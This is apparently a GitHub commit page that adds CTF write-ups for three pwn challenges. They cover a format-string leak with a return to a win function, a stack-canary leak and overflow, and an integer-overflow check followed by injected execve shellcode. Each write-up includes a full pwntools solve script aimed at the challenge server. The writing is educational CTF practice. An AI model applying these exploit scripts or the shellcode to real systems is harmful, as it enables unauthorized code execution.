Skip to content

Commit

Permalink
Writeup update
Browse files Browse the repository at this point in the history
  • Loading branch information
abhinavis2005 committed Jul 4, 2024
1 parent 5ce89dd commit 1925cb3
Show file tree
Hide file tree
Showing 18 changed files with 595 additions and 2 deletions.
2 changes: 1 addition & 1 deletion config.toml
Original file line number Diff line number Diff line change
Expand Up @@ -14,7 +14,7 @@ taxonomies = [
render_emoji = true
external_links_target_blank = true
smart_punctuation = true
highlight_code = false
highlight_code = true
highlight_theme = "gruvbox-dark"

[slugify]
Expand Down
1 change: 1 addition & 0 deletions content/writeups/RVCExIITBFinals/_index.md
Original file line number Diff line number Diff line change
Expand Up @@ -4,5 +4,6 @@ paginate_path = "writeups/RVCExIITBFinals"
title = "RVCExIITB CTF"
sort_by = "date"
page_template = "blog-page.html"
redirect_to = "writeups/RVCExIITBFinals/writeup"
+++

Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
148 changes: 148 additions & 0 deletions content/writeups/RVCExIITBFinals/paranoid2/index.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,148 @@
+++
title = "Paranoid Part 2"
date = 2024-07-02
authors = ["Abhinav I S"]
+++

first, we will run checksec on the binary

```bash
checksec --file=challenge
```
<br>
{{ img(id="image1.png", alt="Alt Text", class="textCenter") }}

Opening the binary in a decompiler (Ghidra) and looking at main function gives

```c

void main(void)

{
undefined local_68 [48];
char local_38 [48];

banner();
puts(
"\nHey its Anonymous again...Someone leaked my temporary location to the FBI and they sent an agent to the location I provided them"
);
puts("\nIt\'s no longer safe to provide you the address of our temporary meeting point.");
puts("\nI\'m gonna have to hide and lay low for a while...");
puts("\nTry reaching out to me after things have settled down");
printf("\nGive me a name so that I can identify you if and when you contact me: ");
fflush(stdout);
read(0,local_38,0x23);
printf("\nAlright Mr. ");
printf(local_38);
printf(
"\nI\'ll look forward to doing business with you...Till then, is there anything that you wou ld like to convey? "
);
fflush(stdout);
read(0,local_68,0x110);
return;
}
```
Analyzing other functions,
there seems to be a suspicious function safe_house
```c
void safe_house(void)
{
char local_98 [136];
FILE *local_10;
local_10 = fopen("flag.txt","r");
if (local_10 == (FILE *)0x0) {
puts(
"\nThere is no \'flag.txt\' present in this directory. Please create sample flag for local e xploitation."
);
/* WARNING: Subroutine does not return */
exit(0);
}
fgets(local_98,0x80,local_10);
printf(local_98);
putchar(10);
fflush(stdout);
/* WARNING: Subroutine does not return */
exit(0);
}
```

clearly, we have to return to this function

there is a printf and two read function calls.
We can exploit a format string vulnereability to leak addresses from the stack, and calculate address of safe_house, since PIE is enabled

first step is to figure out the offset for the printf format string to print out addresses in the code section

starting the binary in gdb, and disassembling main, we find that addresses likely in the text section start with 0x5555555

<br>
{{ img(id="image2.png", alt="Alt Text", class="textCenter") }}

setting a break point at the first printf, and printing the stack

<br>
{{ img(id="image3.png", alt="Alt Text", class="textCenter") }}

we can see that %21$lx prints out the address of main

Next, we need to calculate the address of safe_house
from ghidra, we can see that the address of safe_house is 0x010125a,
and address of main is 0x0101316

So, address of win is main - 188

We can create our solve script, overflowing the buffer, RBP, into the return address

```python
#!/usr/bin/env python3

from pwn import *

exe = ELF("./challenge")

context.binary = exe
# context.log_level = "debug"

def conn():
if args.LOCAL:
r = process([exe.path])
if args.DEBUG:
gdb.attach(r)
else:
r = remote("rvcechalls.xyz", 27250)

return r


def main():
r = conn()
r.recv()
r.sendline(b"%21$lx")
data = r.recv()
lines = data.split(b"\n")
main = lines[1].split(b".")[1].lstrip(b" ")
print(main)
win = int(main,16) - 188
print(hex(win))
payload = b"A"*0x68 + p64(win+1)
r.sendline(payload)
print(r.recv())
r.interactive()




if __name__ == "__main__":
main()
```

giving the flag

```
flag{Mr_S0-c4ll3d_4n0nym0u5_ha5_l04d5ss_0F_53cUr1Ty_155u35_1907e55351f}
```

Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
111 changes: 111 additions & 0 deletions content/writeups/RVCExIITBFinals/paranoid3/index.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,111 @@
+++
title = "Paranoid Part 3"
date = 2024-07-04
authors = ["Abhinav I S"]
+++

First, we run checksec
<br>
{{ img(id="image1.png", alt="Alt Text", class="textCenter") }}

<br>

```c
void main(void)

{
long in_FS_OFFSET;
char local_68 [48];
undefined local_38 [40];
long local_10;

local_10 = *(long *)(in_FS_OFFSET + 0x28);
banner();
puts("\nOkay Its getting serious now. Somehow I now suck at hiding my actual address.");
puts("\nHence, I\'ve now decided to keep one of the strongest security guard on watch");
puts("\nHe will make sure that no one gets in and collects any evidence against me");
puts("\nHe\'s no ordinary guard I tell ya...The FBI fear him!");
printf("\nCan you guess who he is?: ");
fflush(stdout);
read(0,local_68,0x23);
printf("\nReally? you couldn\'t think of anyone better than ");
printf(local_68);
printf(
"\nTill we meet again then my old friend...Give me your final message. You will likely not s ee me now for a long time: "
);
fflush(stdout);
read(0,local_38,0x120);
if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
return;
}
```
looking at the other functions, there is a safe_house function which we need to return to. The difference from paranoid part 2 is the existence of [a stack canary](https://ctf101.org/binary-exploitation/stack-canaries/)
opening the binary in GDB, examining addresses of RBP, and the value that gets printed from the stack, we can calculate the offset to the canary, and the address of main
1. give input %7$lx, the value that gets printed out is 0
2. examine stack and value of rbp
<br>
{{ img(id="image2.png", alt="Alt Text", class="textCenter") }}
3. clearly the canary is at %17$lx and the address of main is at %21$lx
Now, we can write the solve script
```python
#!/usr/bin/env python3
from pwn import *
exe = ELF("./challenge")
context.binary = exe
context.log_level = "debug"
def conn():
if args.LOCAL:
r = process([exe.path])
if args.DEBUG:
gdb.attach(r)
else:
r = remote("rvcechalls.xyz", 33545)
return r
def main():
r = conn()
r.recv()
r.sendline(b"%17$lx.%21$lx")
data = r.recvuntil(b"better than ")
data = r.recv()
addresses = data.split(b"\n")[0]
canary = addresses.split(b".")[0]
main = addresses.split(b".")[1]
# r.recv()
win = int(main,16) - 211
payload = b"A"*0x28 + p64(int(canary,16 ))+ b"B"*8 + p64(win)
r.sendline(payload)
r.recv()
# good luck pwning :)
r.interactive()
if __name__ == "__main__":
main()
```

gives us the flag
<br>

```
flag{Th15_pUnY_6u4rd_aint_S70pp1n_m33_1907ebe25bf}
```
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
121 changes: 121 additions & 0 deletions content/writeups/RVCExIITBFinals/physicistquest/index.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,121 @@
+++
title = "The Physicist's Quest"
date = 2024-07-04
authors = ["Abhinav I S"]
+++

First, we run checksec on the binary

```bash
checksec --file=challenge
```

<br>
{{ img(id="image1.png", alt="Alt Text", class="textCenter") }}

NX disabled indicates we can execute from stack, hence this is likely a shellcode injection challenge.

Now, opening in a decompiler (Ghidra):

```c

undefined8 main(void)

{
int local_70;
int local_6c;
undefined local_68 [92];
uint local_c;

fflush(stdout);
puts("Hi you know my buddy");
puts("He\'s stuck with his research on string theory");
puts(
"He\'s too proud to admit it, but he needs your help. But first you will need to prove that yo u are worthy enough for this"
);
puts("enter two magic numbers");
__isoc99_scanf(&DAT_001020e1,&local_6c);
__isoc99_scanf(&DAT_001020e1,&local_70);
if ((-1 < local_6c) && (-1 < local_70)) {
local_c = local_70 + local_6c;
printf("Your magic value is %d\n",(ulong)local_c);
if ((int)local_c < 0) {
puts(
"Good job! Now you need to figure out my location so that I can trick my friend into meeti ng you"
);
printf("Meet us in secrecy at %p\n",local_68);
read(0,local_68,200);
}
return 0;
}
printf("BAZINGA! Close but not close");
/* WARNING: Subroutine does not return */
exit(0);
}
```
ok , if local_6c and local_70 are positive and their sum is negative, we can write into a buffer, and the address of this buffer is printed out.
The first if conditions can be achieved by [Integer Overflow](https://en.wikipedia.org/wiki/Integer_overflow).
Now, we put shellcode in the buffer and overwrite the return address with the address of the buffer (the shellcode).
We can create our solve script:
```python
#!/usr/bin/env python3
from pwn import *
exe = ELF("./challenge")
context.binary = exe
# context.log_level = "debug"
def conn():
if args.LOCAL:
r = process([exe.path])
if args.DEBUG:
gdb.attach(r)
else:
r = remote("rvcechalls.xyz", 29639)
return r
def main():
shellcode = b"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\x0f\x05"
r = conn()
r.recv()
r.sendline(b"2147483645")
r.sendline(b"10")
data = r.recv()
print(data.split(b" ")[-1])
win = int(data.split(b" ")[-1], 16)
print(hex(win))
payload = shellcode + b"A"*(0x68-48) + p64(win)
# good luck pwning :)
r.sendline(payload)
r.interactive()
if __name__ == "__main__":
main()
```

note that we need an additional 0x68-48 bytes to reach the return address since the shellcode is 48 bytes long.
Shellcode was obtained from a [Shellcode Database](https://shell-storm.org/shellcode/index.html)

Running the script spawns a shell, and we can print out the flag

<br>
{{ img(id="image2.png", alt="Alt Text", class="textCenter") }}
<br>

```
flag{Gre4t_Y0u_h3lp4d_h1m_TBBT}
```
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading

0 comments on commit 1925cb3

Please sign in to comment.